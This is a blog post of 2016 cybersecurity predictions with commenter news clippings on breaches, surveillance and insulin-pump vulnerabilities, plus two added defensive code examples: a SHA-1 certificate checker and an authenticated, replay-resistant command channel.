Here are my predictions for information security and cyber security trends for the year 2016.
The year 2015 was pretty bad for information security, and I would say that the trend is worrying. So I expect that 2016 will bring many information security challenges. If you want to keep yourself up at night, spend some time reading about the latest developments in cybersecurity. In 2015 airplanes were hacked, cars were hacked, and vulnerabilities were found in a breathtaking range of sensitive equipment, from TSA locks to voting booths to medical devices. The big picture is even scarier. Former NSA Director Mike McConnell suspects China has hacked “every major corporation” in the US. Those problems will continue in 2016, and new targets for attacks will be found. The system is broken. It isn’t keeping us, our companies, or our government safe. Worse yet, no one seems to know how to fix it.
Attacks through networks are becoming more common all the time. It will be hard to protect against targeted attacks. Hackers will not only customize malware, but they will increasingly use sophisticated phishing and social engineering tricks to gain access to sensitive data. Attackers usually cover their tracks carefully, and the identification of the target can be very difficult. Behind targeted attacks are usually professional criminals. Criminals do not respect geographical borders, and hence attacks are spread evenly everywhere. Companies will struggle to absorb the security threats of combined PC and mobile devices in 2016.
EU information security decisions made in late 2015 will have an impact on what comes in 2016: the new EU data protection legislation package was approved, and the EU Court of Justice ruled that the Safe Harbor procedure is invalid. This means that transfers of personal data from EU countries to the United States under Safe Harbor violate the law; you need some other agreement for this. The situation will probably get clarified during 2016. Data protection legislation changes will lead to increased fines for the unprepared. Legal uncertainty and big fines are a toxic cocktail for some companies. The combination of stiff penalties and ambiguously worded provisions in the new EU-wide data-protection law, which would replace a patchwork of 28 national laws, raises daunting prospects for companies operating in Europe.
After the huge number of user information leaks in 2015 from all kinds of Internet services, cloud companies will face challenges in gaining trust in their security. You might have just dared to trust “the right cloud services,” since from the traditional information security point of view they seem to have the main things in order, but this raises privacy issues.
New environments will bring new threats. New operating system versions mean that administrators and users are less familiar with the environments. IPv6 will get more widely used, and the security of IPv6 networks is different from IPv4. Organizations are moving to virtualized environments, which are complex and create network layers that can become an attack vector. Growing network virtualization functionality and programmability are both an opportunity and a threat to security. Cyber security research will be important in 2016, as 5G networks will be critical infrastructure on top of which, for example, transport, industry, health and the new operators set up their business around 2020.
The huge amount of information security information is becoming harder and harder to manage in 2016. A key problem, in revelations as in all other news coverage, is the exponential growth of knowledge. There are a variety of news summaries produced on a daily basis, but they are not enough to get a good picture of what is happening. There are bigger and smaller news items, the impact of which is at times very difficult to assess. SMBs will become a bigger target for cybercriminals. Network and security professionals continue to be among the toughest IT talent to find and hire.
The old way of network security, focused on perimeter defense, is not enough in 2016. The old mantras “encrypt everything” and “secure the perimeter” are not enough. One deceptive truth seems to drive much of the cybersecurity industry down a rabbit hole: if you keep bad actors and bad software out of your system, you have nothing to worry about. It does not work like that anymore. As perimeter security gets stronger, malicious actors look for easier entry points to compromise an organisation through the breadth of its digital attack surface. Now malicious actors target “endpoints” (any device or sensor connected to a network) to break into that network. Traditional sandboxing will no longer protect against the growing malware landscape. Today, most private networks have far too many endpoints to secure properly. In an age of “Bring Your Own Device,” the cloud, remote access, and the Internet of Things, there are too many vulnerabilities hackers can exploit. Keep in mind that everything connected to the Internet can, and will, be hacked. To address those threats in 2016, security experts should assume compromise (that hackers and malware already have breached their defenses, or soon will) and instead classify and mitigate threats. In addition to the public key infrastructure lock-and-key system, you will also need an integrity solution that acts like an alarm. To protect against advanced threats, security professionals will increase their reliance on centralized security management solutions. You need to have prioritization and response plans for various kinds of breaches, with a strong focus on integrity.
Law enforcement versus Silicon Valley tension will continue to be strong throughout 2016. In 2015, law enforcement and politicians on both sides of the Atlantic lined up to repeatedly complain that the web was “going dark” as a result of end-to-end encryption and that this was hampering the investigation of terrorism and other serious crimes. Technologists and cryptographers argue that governments are trying to weaken encryption by demanding some form of privileged access for government. It’s not clear how much encryption the NSA can break. With renewed focus on how encrypted messages can be used to plot terrorist attacks, President Barack Obama’s administration is stepping up pressure on the tech sector to help in the battle. Privacy remains a major counter-argument. It seems that governments lie about encryption backdoors. Encryption systems weakened by mandated backdoors would not be effective in fighting the terrorists that governments invoke as their reason for wanting those backdoors in the first place.
But this does not stop some government officials from demanding such things, with varying success in different countries. Another fact is that the existence of coded communications is a reality, and the U.S. may not be able to do much about it because nearly everyone living in modern society uses it: encryption protects your bank information, prevents your password from being stolen when you log into a website, and allows all e-commerce transactions to take place securely. Encryption weakened by mandated backdoors would put all of us at enormous risk of exposure from data breaches and associated online risks. The truth in 2016 is that any form of privileged access for government (i.e., a backdoor) would inevitably weaken crypto-systems and make them more vulnerable to attacks by foreign governments’ intelligence agencies as well as criminals; Juniper’s VPN security hole is proof that government backdoors are bonkers. Encryption backdoors would be a gleeful win-win for terrorists and a horrific lose-lose for you: the bad guys would have strong protections for their data, and the rest of us would not. Poorly thought-out and crude surveillance techniques could have a devastating effect on a country’s internet security; for example, Kazakhstan will force its citizens to install internet backdoors by requiring all Internet users to install a state-issued root certificate by January 1, 2016.
Google, Mozilla and Microsoft are pushing for an early SHA-1 crypto cutoff that could happen in 2016 instead of the earlier planned January 1st, 2017, due to recent research showing that SHA-1 is weaker than previously believed, because it has been cracked without enormous effort. Mozilla, Microsoft and now Google are all considering bringing the deadline forward by six months to July 1, 2016. SHA-2 is going to be used as the replacement function for SHA-1. Websites like Facebook and those protected by CloudFlare have implemented a SHA-1 fallback mechanism for those systems that do not support SHA-2. Chrome will start displaying errors if SHA-1 certificates are employed in early 2016 and will completely stop supporting SHA-1 certificates at the end of 2016.
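An added example (not from the original post) of the check an operator would run over their own certificate inventory ahead of the cutoff: it reads the signatureAlgorithm OID straight out of the DER structure, so it needs no third-party library. SAMPLE_PEM and make_test_cert are constructed stand-ins that wrap a genuine AlgorithmIdentifier in a dummy certificate body; they are not real certificates.

```python
"""Flag certificates signed with SHA-1 by reading the DER signatureAlgorithm OID.

Added example with a minimal DER walker and no third-party dependencies.
Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signatureValue }
"""
import base64
import re

# Well-known signature-algorithm OIDs that rely on SHA-1.
SHA1_SIGNATURE_OIDS = {
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.10045.4.1": "ecdsa-with-SHA1",
    "1.2.840.10040.4.3": "dsa-with-sha1",
}

# Constructed sample (NOT a real certificate): dummy tbsCertificate and signature
# wrapped around a genuine sha1WithRSAEncryption AlgorithmIdentifier.
SAMPLE_PEM = """-----BEGIN CERTIFICATE-----
MBgwAwIBATANBgkqhkiG9w0BAQUFAAMCAAA=
-----END CERTIFICATE-----"""

def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after the element) for the DER element at pos."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length

def _decode_oid(value: bytes) -> str:
    """Decode OID contents to dotted form; the first octet packs the first two arcs."""
    arcs = [value[0] // 40, value[0] % 40]
    acc = 0
    for b in value[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:  # a clear high bit ends the current arc
            arcs.append(acc)
            acc = 0
    return ".".join(str(a) for a in arcs)

def signature_algorithm_oid(der: bytes) -> str:
    """Extract the outer signatureAlgorithm OID of a DER-encoded certificate."""
    tag, cert, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("certificate is not a SEQUENCE")
    _, _tbs, pos = _read_tlv(cert, 0)      # skip tbsCertificate
    tag, alg_id, _ = _read_tlv(cert, pos)   # AlgorithmIdentifier SEQUENCE
    if tag != 0x30:
        raise ValueError("malformed AlgorithmIdentifier")
    tag, oid, _ = _read_tlv(alg_id, 0)
    if tag != 0x06:
        raise ValueError("AlgorithmIdentifier does not start with an OID")
    return _decode_oid(oid)

def pem_to_der(pem: str) -> bytes:
    """Strip the PEM armour lines and base64-decode the body."""
    return base64.b64decode(re.sub(r"-----[A-Z ]+-----|\s", "", pem))

def uses_sha1(der: bytes):
    """Return (is_sha1, oid); a True result means browsers will reject it after the cutoff."""
    oid = signature_algorithm_oid(der)
    return oid in SHA1_SIGNATURE_OIDS, oid

def check_pem(pem: str) -> str:
    """Human-readable verdict for one PEM certificate."""
    is_sha1, oid = uses_sha1(pem_to_der(pem))
    if is_sha1:
        return "SHA-1 signature (%s): replace before the cutoff" % SHA1_SIGNATURE_OIDS[oid]
    return "not SHA-1 (%s)" % oid

# --- helpers to build further constructed test certificates with any OID ---
def _tlv(tag: int, value: bytes) -> bytes:
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value

def _encode_oid(dotted: str) -> bytes:
    arcs = [int(a) for a in dotted.split(".")]
    out = [arcs[0] * 40 + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out.extend(reversed(chunk))
    return bytes(out)

def make_test_cert(sig_oid: str) -> bytes:
    """Constructed stand-in with a long signature field so long-form lengths are exercised."""
    tbs = _tlv(0x30, _tlv(0x02, b"\x01"))
    alg = _tlv(0x30, _tlv(0x06, _encode_oid(sig_oid)) + _tlv(0x05, b""))
    return _tlv(0x30, tbs + alg + _tlv(0x03, b"\x00" * 201))
```

Run check_pem over each PEM file in your inventory; certificates reported as SHA-1 are the ones Chrome will warn about in early 2016.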
The use of Blockchain technology, a permissionless distributed database based on the bitcoin protocol that runs across a global network of independent computers, will spread more widely than just Bitcoin virtual money. With bitcoin, the Blockchain tracks the exchange of money. But it can also track the exchange of anything else that holds value, including stocks, bonds, and other financial securities. Overstock has already used the blockchain to issue private bonds. The Securities and Exchange Commission has approved a plan from online retailer Overstock.com to issue company stock via the Internet, signaling a significant shift in the way financial securities will be distributed and traded in the years to come. Overstock built its technology under the aegis of a subsidiary called TØ.com, and it plans to offer this “cryptosecurity” tech as a service to other businesses. Nasdaq OMX, the company behind the Nasdaq stock exchange, is using the blockchain to oversee the exchange of private stock. Also, several major companies from across both the technology and financial industries (including IBM, Intel, and Cisco as well as the London Stock Exchange Group and big-name banks JP Morgan, Wells Fargo, and State Street) have joined forces with the Linux Foundation to create an alternative to the blockchain.
The use of disk encryption will increase, and there are different ways to do it with different security levels. Microsoft has introduced Windows 10 disk encryption where the keys are uploaded to Microsoft. This approach has some advantages and disadvantages. The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well. It protects data in case your device is lost or stolen. But what if you forget or lose your key? There are certainly cases where it’s helpful to have a backup of your key or password, so keeping a backup of your recovery key in your Microsoft account could be genuinely useful for probably the majority of users who don’t have high security needs. The disadvantage of this approach is that your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.
Weak and leaked passwords are still a huge security problem in 2016. Passwords are often the weakest part when it comes to securing users’ accounts, as many don’t use complex passwords or they reuse the same password across services. Two-factor authentication, like using a USB stick with a secret token or entering a code sent via text message to your phone, can help to increase security, but many users also find this to be a hassle, as it introduces an additional step to the login process.
Google has begun testing a login system that uses phone notifications for authentication instead of passwords: users authenticate by responding to a notification sent to their smartphone. The idea is similar to Yahoo’s recently launched “Account Key,” which also offers a password-free means of signing in, involving a push notification sent to your phone that then opens an app where you approve the log-in.
The smartphone will become a more and more security-critical part of your life. “Increasingly, individuals and organisations are adopting password managers and multi-factor authentication technologies to plug some of the holes in password-based authentication.” “We foresee a world where practically everyone uses their smartphone as a multi-factor authentication element. In this world, the smartphone becomes your most valuable asset: something that enables you to unlock your life online and a target for attackers seeking to access your services.”
Expect that the number of mobile vulnerabilities will only grow in 2016. In 2016 we will see increasing numbers of cyber criminals using mobile applications to spread malware. Mobile presents an easy target for cyber criminals, because it is an attack surface that is open and extremely difficult to defend once an app has been released. Android threats will become more than just headline-grabbers. Will 2016 be the year iOS malware goes mainstream?
Critical infrastructures will be highly targeted in 2015. SCADA and ICS networks were not designed for security. Attacks against these systems have increased in recent years. I expect this trend to only get worse. There are still many companies that run their critical systems on Windows XP, as “there are some people who don’t have an option to change.” Many times the OS is running in automation and process control systems that run business- and mission-critical systems, in both private sector and government enterprises. For example, the US Navy is using the obsolete operating system Microsoft Windows XP to run critical tasks. It all comes down to money and resources, but if someone is obliged to keep something running on an obsolete system, it’s completely the wrong approach to information security.
Cars were hacked at a record rate in 2015, and they will be hacked at least at the same rate in 2016. Modern cars feature more gadgetry and connected systems, and this will make vehicles just as vulnerable to today’s threats and attacks. I Am The Cavalry has published a five-star Cyber Safety Framework to mitigate this threat in cars; hopefully car component makers study it.
IoT and smart devices are still at risk. The Internet of Things will continue to emerge, and businesses will need to think about how to protect their smart devices and prepare for the wider adoption of IoT. IoT platforms are not yet the weapon of choice for commercial malware authors, but businesses beware. Wearables won’t be safe either, as they are built using largely the same, too often vulnerable, technologies as other IoT systems. IoT security is still in its infancy in 2016.
Cyber criminals became more active in 2015, particularly with ransom malware. The ransom-malware problem will continue to be big in 2016. Commercial malware authors will continue to invest heavily, and exploit kits will continue to dominate on the web. Ransomware today is big business. Ransomware takes control of a computer and holds it hostage until the victim pays, usually in the digital currency Bitcoin. As a remedy against ransom-malware, I recommend ensuring with IT support or your service provider that the data backup and restore procedure is operational, practiced and tested. You may need it in 2016 to get your data back without considering paying criminals. To date ransomware has hit Windows users hardest, although Android and MacOS users are now also facing similar extortion.
Ransomware will continue to dominate in 2016, and it is only a question of time before we see things beyond data being ransomed. We have already seen websites being held to ransom with DDoS. Intel’s McAfee Labs also noted a huge spike in ransomware in early 2015, and worries about ransomware in the IoT space, including medical devices. And Kaspersky predicts the “nightmare of ransomware” to continue and “spread to new frontiers” in 2016. The article Ransomware Is Coming to Medical Devices tells that, according to a report recently released by Forrester Research, the number one cybersecurity prediction for 2016 is: “We’ll see ransomware for a medical device or wearable.” “It’s definitely feasible from a technical standpoint”. Networked medical devices save lives. Despite the hacking risk, it’s an informed trade-off. Medical device ransomware would be a modern form of highway robbery with lives at stake.
Keep in mind that everything connected to the Internet can, and will, be hacked. In 2016, if you’re not paranoid, you’re crazy. As government agencies and tech companies develop more and more intrusive means of watching and influencing people, how can we live free lives? Unfortunately I don’t have a solution for that.
Tomi Engdahl says:
Jacob Kastrenakes / The Verge:
BuzzFeed hacked by hacker group OurMine after publishing story identifying a member; group alters articles, claimed to have seized database, threatens release
BuzzFeed vandalized by hacking group after exposing alleged member
http://www.theverge.com/2016/10/5/13172430/buzzfeed-hacked-by-ourmine-after-exposing-member
A number of BuzzFeed posts were vandalized by hackers this morning in apparent retaliation for a story that claimed to expose a member of their group. The hacking group, which goes by OurMine, changed the titles of several BuzzFeed posts to read “Hacked by OurMine” and replaced the body of some stories with a note not to “share fake news about us again.”
The hackers also claimed to have BuzzFeed’s “database” and threatened to publish it.
The hack comes the morning after BuzzFeed ran a story on OurMine, identifying a teenager who appeared to be a member of the group.
OurMine has taken responsibility for a number of prominent social media hacks in recent months, including taking control of accounts from the CEOs of Facebook, Google, and Twitter. It also broke into Variety’s website earlier this year.
Tomi Engdahl says:
Google becomes the dreaded Big Brother
Google Assistant has become more sophisticated, utilizing an artificial intelligence sidekick.
- The smartphone has become the remote control of our lives. But over the next ten years, computing will be used universally everywhere, Pichai painted.
The role of Google Assistant here is to act as a natural conversation between you and Google.
Google Assistant is intended to operate in all possible devices to the office and the car from the smartphone to the TV. Starting from Pixel and Pixel XL smart phones. It works as Siri, but has access to all Google knows about you and everything else.
This ‘big brother’ has been previously described in science fiction literature.
Source: http://etn.fi/index.php?option=com_content&view=article&id=5163:googlesta-tulee-pelatty-isoveli&catid=13&Itemid=101
Tomi Engdahl says:
New York Times:
Government official: Yahoo got FISA order to scan incoming email for terrorist digital signature, used existing spam filtering, no longer collecting this data — Yahoo was ordered last year to search incoming emails for the digital “signature” of a communications method used by a state-sponsored …
Yahoo Said to Have Aided U.S. Email Surveillance by Adapting Spam Filter
http://www.nytimes.com/2016/10/06/technology/yahoo-email-tech-companies-government-investigations.html
Tomi Engdahl says:
Jim Finkle / Reuters:
Johnson & Johnson warns of vulnerability in insulin pumps used by 114K people across USA and Canada that could cause overdose if exploited; issues workarounds
J&J warns diabetic patients: Insulin pump vulnerable to hacking
http://www.reuters.com/article/us-johnson-johnson-cyber-insulin-pumps-e-idUSKCN12411L
Johnson & Johnson is telling patients that it has learned of a security vulnerability in one of its insulin pumps that a hacker could exploit to overdose diabetic patients with insulin, though it describes the risk as low.
Medical device experts said they believe it was the first time a manufacturer had issued such a warning to patients about a cyber vulnerability, a hot topic in the industry following revelations last month about possible bugs in pacemakers and defibrillators.
“The probability of unauthorized access to the OneTouch Ping system is extremely low,” the company said in letters sent on Monday to doctors and about 114,000 patients who use the device in the United States and Canada.
“It would require technical expertise, sophisticated equipment and proximity to the pump, as the OneTouch Ping system is not connected to the internet or to any external network.”
The system is vulnerable because those communications are not encrypted, or scrambled, to prevent hackers from gaining access to the device, said Radcliffe, who reported vulnerabilities in the pump to J&J in April and published them on the Rapid7 blog on Tuesday.
R7-2016-07: Multiple Vulnerabilities in Animas OneTouch Ping Insulin Pump
https://community.rapid7.com/community/infosec/blog/2016/10/04/r7-2016-07-multiple-vulnerabilities-in-animas-onetouch-ping-insulin-pump
Today we are announcing three vulnerabilities in the Animas OneTouch Ping insulin pump system, a popular pump with a blood glucose meter that serves as a remote control via RF communication. Before we get into the technical details, we want to flag that we believe the risk of wide scale exploitation of these insulin pump vulnerabilities is relatively low, and we don’t believe this is cause for panic. We recommend that users of the devices consult their healthcare providers before making major decisions regarding the use of these devices. More on that further down in this post.
These issues have been reported to the vendor, Animas Corporation, CERT/CC, the FDA and DHS.
Three major findings were discovered during the analysis of the product.
R7-2016-07.1: Communications transmitted in cleartext (CVE-2016-5084)
R7-2016-07.2: Weak pairing between remote and pump (CVE-2016-5085)
R7-2016-07.3: Lack of replay attack prevention or transmission assurance (CVE-2016-5086)
The OneTouch Ping does not communicate on 802.11 WiFi, or otherwise communicate on the internet. However, it is believed these attacks could be performed from one to two kilometers away, if not substantially further, using sufficient elevation and off-the-shelf radio transmission gear available to ham radio hobbyists.
The normal use case between the remote and pump is approximately 10 meters. In 2011, Barnaby Jack of McAfee, Inc. claimed an ability to perform a 900MHz band attack from 90 meters away with an external directional antenna (a commercial 3 element yagi), however he did not execute this attack against the OneTouch Ping.
Using industry standard encryption with a unique key pair would mitigate these issues.
Affected users can avoid these issues entirely by disabling the radio (RF) functionality of the device.
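As an added illustration of the mitigation the post suggests (this is not the Animas protocol or Rapid7's code), here is a counter-plus-HMAC command channel that addresses the cleartext-tampering, weak-pairing and replay findings at once; PairedRemote, Pump and simulate are hypothetical names, and the pairing key is assumed to be established out of band during pairing.

```python
"""Counter-plus-HMAC command channel between a remote and an insulin pump.

Added example (not the Animas protocol): each frame carries a monotonically
increasing counter and a truncated HMAC-SHA256 tag under a per-pairing key,
so a captured frame cannot be replayed, altered, or forged by an unpaired remote.
"""
import hashlib
import hmac
import os
import struct

TAG_LEN = 16  # 128-bit truncated tag


class PairedRemote:
    """Remote control side: holds the pairing key and its send counter."""

    def __init__(self, pair_key: bytes):
        self.key = pair_key
        self.counter = 0  # in a real device this must survive power cycles

    def send(self, command: str) -> bytes:
        self.counter += 1
        body = struct.pack(">I", self.counter) + command.encode()
        tag = hmac.new(self.key, body, hashlib.sha256).digest()[:TAG_LEN]
        return body + tag


class Pump:
    """Pump side: accepts a frame only if the tag verifies and the counter is new."""

    def __init__(self, pair_key: bytes):
        self.key = pair_key
        self.last_counter = 0
        self.accepted = []

    def receive(self, frame: bytes) -> str:
        if len(frame) < 4 + TAG_LEN:
            return "reject: short frame"
        body, tag = frame[:-TAG_LEN], frame[-TAG_LEN:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):   # constant-time comparison
            return "reject: bad tag"                  # forged, tampered or unpaired
        counter = struct.unpack(">I", body[:4])[0]
        if counter <= self.last_counter:
            return "reject: replay"                   # this counter was already used
        self.last_counter = counter
        command = body[4:].decode()
        self.accepted.append(command)
        return "accept: " + command


def simulate() -> list:
    """Constructed exchange: one legitimate bolus, then the cases the findings describe."""
    pair_key = os.urandom(32)  # established once during pairing, never sent over the air
    remote, pump = PairedRemote(pair_key), Pump(pair_key)
    results = []
    frame = remote.send("BOLUS 2.0U")
    results.append(pump.receive(frame))        # legitimate command
    results.append(pump.receive(frame))        # same frame captured and resent
    tampered = bytearray(frame)
    tampered[5] ^= 0x01                        # flip one bit in the command text
    results.append(pump.receive(bytes(tampered)))
    rogue = PairedRemote(os.urandom(32))       # remote that never paired with this pump
    results.append(pump.receive(rogue.send("BOLUS 9.9U")))
    results.append(pump.receive(remote.send("STATUS")))  # next real command still works
    return results
```

This gives integrity and replay protection only; the confidentiality the post's mitigation also calls for would need an authenticated-encryption mode on top, and a lost counter state forces a re-pair.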
Tomi Engdahl says:
New York Times:
Signal received a federal subpoena with gag order in first half of this year demanding IP addresses, browsing histories, and more, but it could hand over little
Subpoenas and Gag Orders Show Government Overreach, Tech Companies Argue
http://www.nytimes.com/2016/10/05/technology/subpoenas-and-gag-orders-show-government-overreach-tech-companies-argue.html
It has been six months since the Justice Department backed off on demands that Apple help the F.B.I. break the security of a locked iPhone.
But the government has not given up the fight with the tech industry. Open Whisper Systems, a maker of a widely used encryption app called Signal, received a subpoena in the first half of the year for subscriber information and other details associated with two phone numbers that came up in a federal grand jury investigation in Virginia.
The subpoena arrived with a court order that said Open Whisper Systems was not allowed to tell anyone about the information request for one year.
Technology companies contend that court-imposed gag orders are being used too often by law enforcement and that they violate the Bill of Rights.
Justice Department officials, for their part, argue that these gag orders are necessary to protect developing cases and to avoid tipping off potential targets. The officials say that they are simply following leads where they take them.
The information request made of Open Whisper Systems is particularly sensitive, since its encryption app is used around the world, and it is often recommended to journalists and human rights activists.
“The Signal service was designed to minimize the data we retain,” said Moxie Marlinspike, the founder of Open Whisper Systems. Mr. Marlinspike said Signal uses a technology called end-to-end encryption that kept the service from gaining access to the contents of its users’ messages. The company also does not store information on those with whom its users are communicating.
In other circumstances, the government has tried to force companies via court order to re-engineer their services to collect missing pieces of information, as it did with Apple earlier this year and in a similar case in 2013 against Lavabit, a small encrypted messaging service used by the former defense contractor Edward J. Snowden.
The government did not make that request of Open Whisper Systems. “They need to pick those cases carefully,” Ms. Granick said. “They are only picking cases where they think they’re going to have the people on their side.”
Tomi Engdahl says:
New York Times:
US government officially blames Russia for hacking Democratic National Committee to “interfere with the US election process” — WASHINGTON — The Obama administration on Friday formally accused the Russian government of stealing and disclosing emails from the Democratic National Committee …
U.S. Says Russia Directed Hacks to Influence Elections
http://www.nytimes.com/2016/10/08/us/politics/us-formally-accuses-russia-of-stealing-dnc-emails.html
The Obama administration on Friday formally accused the Russian government of stealing and disclosing emails from the Democratic National Committee and a range of other institutions and prominent individuals, immediately raising the issue of whether President Obama would seek sanctions or other retaliation.
In a statement from the director of national intelligence, James R. Clapper Jr., and the Department of Homeland Security, the government said the leaked emails that have appeared on a variety of websites “are intended to interfere with the U.S. election process.”
Tomi Engdahl says:
Lorenzo Franceschi-Bicchierai / Motherboard:
Source: email scanner installed after government order was not a modified spam filter; Yahoo’s security team thought it was a rootkit when they discovered it — The spy tool that the US government ordered Yahoo to install on its systems last year at the behest of the NSA or the FBI was a …
Yahoo’s Government Email Scanner Was Actually a Secret Hacking Tool
http://motherboard.vice.com/read/yahoo-government-email-scanner-was-actually-a-secret-hacking-tool
The spy tool that the US government ordered Yahoo to install on its systems last year at the behest of the NSA or the FBI was a “poorly designed” and “buggy” piece of malware, according to two sources closely familiar with the matter.
Last year, the US government served Yahoo with a secret order, asking the company to search within its users’ emails for some targeted information, as first reported by Reuters this week.
Anonymous sources told The Times that the tool was nothing more than a modified version of Yahoo’s existing scanning system, which searches all email for malware, spam and images of child pornography.
But two sources familiar with the matter told Motherboard that this description is wrong, and that the tool was actually more like a “rootkit,” a powerful type of malware that lives deep inside an infected system and gives hackers essentially unfettered access.
The rootkit-like tool was found by Yahoo’s internal security testing team during one of their checkups, according to a source.
“They assumed it was a rootkit installed by hackers,”
After the Yahoo security team discovered the spy tool and opened a high severity security issue within an internal tracking system, according to the source, the warning moved up the ranks. But when the head of security at the time, Alex Stamos, found out it was installed on purpose, he spoke with management; afterward, “somehow they covered it up and closed the issue fast enough that most of the [security] team didn’t find out,” the source said.
In other words, the incident was an “extremely well kept” secret, the source said.
Tomi Engdahl says:
Thanks To Encryption, Governments Need Companies Like Yahoo To Spy on Users
http://motherboard.vice.com/read/thanks-to-encryption-governments-need-companies-like-yahoo-to-spy-on-users?trk_source=recommended
Last year, the US government asked Yahoo to scan all its customers emails to look for the digital “signature” of certain method of communication used by a terrorist group.
The secret scanning tool rocked the tech world and that of privacy and anti-surveillance activists this week, shocked by how broad the request was, and the fact that it had been kept under wraps until Reuters reported its existence this week.
In an age where the FBI asked Apple to unlock the iPhone of a dead terrorist, and countless top secret documents revealed the vast surveillance powers of the NSA, asking Yahoo to use a scanning tool that former employees defined as a “buggy” and a “poorly designed” “backdoor” or “rootkit,” was an unusual request as it wasn’t targeted—Yahoo was essentially looking through the whole haystack looking for a few needles—and the company apparently didn’t fight back.
But such a request is a perfect example of how the rise of encryption technologies has changed the face of government surveillance. Before large tech companies such as Google and Yahoo turned on default encryption across their services, including email—in the process protecting their customers’ data as it travelled from their computers to the company’s servers, as well as when the data travelled through the internet—the NSA could’ve gone through users’ data without having to knock on Yahoo’s door.
As revealed by documents leaked by Edward Snowden, the NSA and its British partner GCHQ have taps on the internet backbone infrastructure, and used to collect data directly from what they called “upstream” providers, none other than large ISPs. Before the Snowden revelations, when companies such as Microsoft, Yahoo, and other email providers didn’t use encryption, all these emails were travelling in the clear over the internet, and were collected by spy agencies.
Especially in the aftermath of the Snowden leaks, companies started adopting HTTPS
Gmail and other providers were encrypted. The number rose to 58 percent in 2014, when major providers like Yahoo and Microsoft also adopted STARTTLS. Now, it’s almost pervasive, at more than 80 percent.
“Every time a provider turns on STARTTLS the NSA loses access to more and more email,” Soghoian told me. “NSA has lost a good percentage of its visibility into international email traffic without the help of tech companies.”
Tomi Engdahl says:
How France’s TV5 was almost destroyed by ‘Russian hackers’
http://www.bbc.com/news/technology-37590375
A powerful cyber-attack came close to destroying a French TV network, its director-general has told the BBC.
TV5Monde was taken off air in April 2015. A group calling itself the Cyber Caliphate, linked to so-called Islamic State, first claimed responsibility.
But an investigation now suggests the attack was in fact carried out by a group of Russian hackers.
The attack used highly targeted malicious software to destroy the TV network’s systems.
Wednesday 8 April
just launched its latest channel.
Just as they were being served their appetisers at 20:40 local time, a flood of texts and calls informed him that all 12 channels had gone off air.
“It’s the worst thing that can happen to you in television,”
It quickly became clear that the network had been subject to a serious cyber-attack.
“We were a couple of hours from having the whole station gone for good.”
It was a race against time – more systems were corrupted with every passing minute. Any substantial delay would have led satellite distribution channels to cancel their contracts, placing the entire company in jeopardy.
“We were saved from total destruction by the fact we had launched the channel that day and the technicians were there,”
At 05:25 local time, one channel was restored. Others followed later that morning.
The attack was far more sophisticated and targeted than reported at the time. The perpetrators had first penetrated the network on 23 January.
They carried out reconnaissance of TV5Monde to understand the way in which it broadcast its signals. They then fabricated bespoke malicious software to corrupt and destroy the internet-connected hardware that controlled the TV station’s operations – such as the encoder systems used to transmit programmes.
The attackers used seven different points of entry. Not all of them were part of TV5Monde or in France.
The investigators had come to believe that the attackers had used the jihadist posts to try to cover their tracks.
Mr Bigot was later told evidence had been found that his network had been attacked by a group of Russian hackers, who are known as APT 28.
He explained that the investigators had only been able to prove two things.
Firstly, that the attack was designed to destroy the channel, and secondly, that it was linked to APT 28.
Tomi Engdahl says:
Destructive intent
It’s not uncommon for cyber-attackers to enter a target’s network to look for information.
But what happened to TV5 was not espionage – the aim was destruction. And that is indicative of a new trend: attacks with physical-world consequences.
Arguably, the pioneering state-backed attack of this type was Stuxnet.
More recently, a power station in Ukraine was switched off by cyber-attackers.
The TV5 attack fits into this pattern of highly-targeted attacks, rather than the kind of general criminal activity typically seen on the web.
Dangerous precedent
The impact on TV5 was enormous.
In the immediate aftermath, staff had to return to using fax machines as they could not send emails.
“We had to wait for months and months before we reconnected to the internet,”
The financial cost was €5m ($5.6m; £4.5m) in the first year, followed by over €3m (£3.4m; £2.7m) every following year for new protection.
But the biggest challenge has been to the way the company works. Every employee has had to change their behaviour.
Special authentication procedures are needed to check email from abroad, flash drives have to be tested before being inserted.
“We never will be as we were before,” said Mr Bigot. “It is too dangerous.”
Source: http://www.bbc.com/news/technology-37590375
Tomi Engdahl says:
Be wary of: the Internet war is being fought on a daily basis
The history of the Internet is a noble and academic one. After its military starting points, our fathers’ internet was above all a communication bus for universities and research centres. The first to surf the waves of data were academics, in Finland too. The subsequent development has not been as sublime.
At the same time as the Internet hit the mainstream in earnest, Bill Clinton’s vice president Al Gore served as the cover image of the Information Superhighway project, the centre of which was information and the use of information. The whole world was excited about the network of networks, which promised to put all the knowledge of the world within reach of every human being.
When we fast-forward 20 years, the visions have been realised. All the knowledge of the world is indeed available to us. Unlike before, the data is also with us: smart devices allow us to access the world’s data storage everywhere.
At the same time, as technology has developed at a furious pace, academics have become a small minority among network user groups. The masses have discovered the network of knowledge, and the ideal is buried under commercialism and entertainment.
Today’s network is full of semi-information: it is a breeding ground for conspiracy theories, hoaxes, misrepresentation of information, propaganda and various kinds of influence on businesses. Instead of information, people share each other’s beliefs.
The distribution of peer-reviewed scientific publications does not accumulate likes: the inflation of data favours entertainment.
The most significant part of the nonsense is due to the ignorance of users. Much more dangerous is the phenomenon of information warfare and the influencing of users’ thinking, where state actors professionally use the network as a propaganda distribution channel as well as a tool to obscure reality. The phenomenon is not new, but its volume has grown at a furious pace.
Each of us is a victim of information warfare on a daily basis.
